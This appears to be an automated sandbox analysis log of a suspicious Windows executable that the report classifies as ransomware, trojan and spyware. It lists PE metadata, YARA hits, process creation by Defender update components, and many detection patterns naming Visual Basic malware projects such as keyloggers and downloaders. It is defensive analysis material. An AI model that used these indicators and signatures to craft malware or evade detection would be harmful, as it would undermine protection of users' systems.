Source: MpAsDesc.dll.mui18.17.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: mpuxagent.dll.mui20.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.17.dr Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.10.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui43.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui40.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui10.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui6.17.dr Static PE information: No import functions for PE file found
Source: mpavbase.vdm.11.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui38.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui9.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.17.dr Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.10.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.17.dr Static PE information: No import functions for PE file found
Source: mpasbase.vdm.11.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui19.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui9.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui42.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.17.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui36.17.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.17.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui4.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui41.17.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.17.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 1gPmnCR2PX.exe, 00000006.00000000.18137281855.0000000000426000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBLRESLERS.exe vs 1gPmnCR2PX.exe
Source: 1gPmnCR2PX.exe, 00000006.00000002.18690335767.0000000002BB0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameBLRESLERS.exeFE2XAssoleanerAssoElectrum vs 1gPmnCR2PX.exe
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe Process token adjusted: Security
Yara detected Winexe tool
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.168.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e1c15c6.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c7264.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e11334e.136.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c6d17.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5e0c67ca.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Source: mpasdlta.vdm.10.dr Static PE information: Section: .rsrc ZLIB complexity 0.998618847943
Source: mpavdlta.vdm.10.dr Static PE information: Section: .rsrc ZLIB complexity 0.996141098485
Source: 1gPmnCR2PX.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.mine.winEXE@13/304@2/3
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E304B0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 18_2_00007FF7E304B0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E3061AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError, 18_2_00007FF7E3061AE0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: sload.vbp
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 2-.+:\\Users\\alx\\Desktop\\xxxx\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: @.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: /*.+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+\\Motivo\\Moti.*\\Venta\\.+\\MotivosMo.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp Binary or memory string: .vbpa)
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\aw1\\Etmscztha.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 0MicroProCon\MicroCon.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+\\Progetos\\Msn Spybox\\.+.vbp
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: &!.+\\Progetos\\Msn Spybox\\.+.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: lgC:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+\\Poll\\oPoll\\.+\\PolloPoll.vbp
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 1,.+:\\OsamaB\\inLa\\den.+\\.*\\OsamaBinL.vbp
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: RF:\vb\VISUAL BASIC\VARIOS\teuer\Teuer.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\Users\\alx\\Desktop\\xxxx\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .vbp
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp Binary or memory string: z1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 4\MicroProCon\SeconFile.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 2-.+\\Motivo\\Moti.*\\Venta\\.+\\MotivosMo.vbp
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: @*\AD:\Master\ADWARA_NEW\codec\Codec.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: Z*\AE:\Stuff\Lilith Premium\Start\Projekt1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\\GotaGo\\.*\\otaGotaGo.vbp
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: nAndr huttaP.vbpxY
Source: MpSigStub.exe, 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp Binary or memory string: .VBProjects
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 72E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: AD:\Cambiador.vbp
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: *\AC:\Documents and Settings\tjasi\Desktop\Downloader\Stub\p.vbpd"URLDownloadToFile
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\OsamaB\\inLa\\den.+\\.*\\OsamaBinL.vbp
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.sln.|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 61.+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\NuAT.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: (#.+\\Poll\\oPoll\\.+\\PolloPoll.vbp
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: "D:\SK51\Keys.vbp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: 1gPmnCR2PX.exe Virustotal: Detection: 22%
Source: 1gPmnCR2PX.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\1gPmnCR2PX.exe 'C:\Users\user\Desktop\1gPmnCR2PX.exe'
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-796ed98e.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-796ed98e.exe /q WD
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\4EDE279A-C0F0-19A6-1502-6263C94C7DB4.man
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\4EDE279A-C0F0-19A6-1502-6263C94C7DB4.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-728dfe11.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-728dfe11.exe
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process created: C:\Users\user\Desktop\1gPmnCR2PX.exe 'C:\Users\user\Desktop\1gPmnCR2PX.exe'
Source: C:\Windows\System32\wevtutil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AF118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 18_2_00007FF7E30AF118
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\Local\Temp\~DF293283A36A66FD97.TMP
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
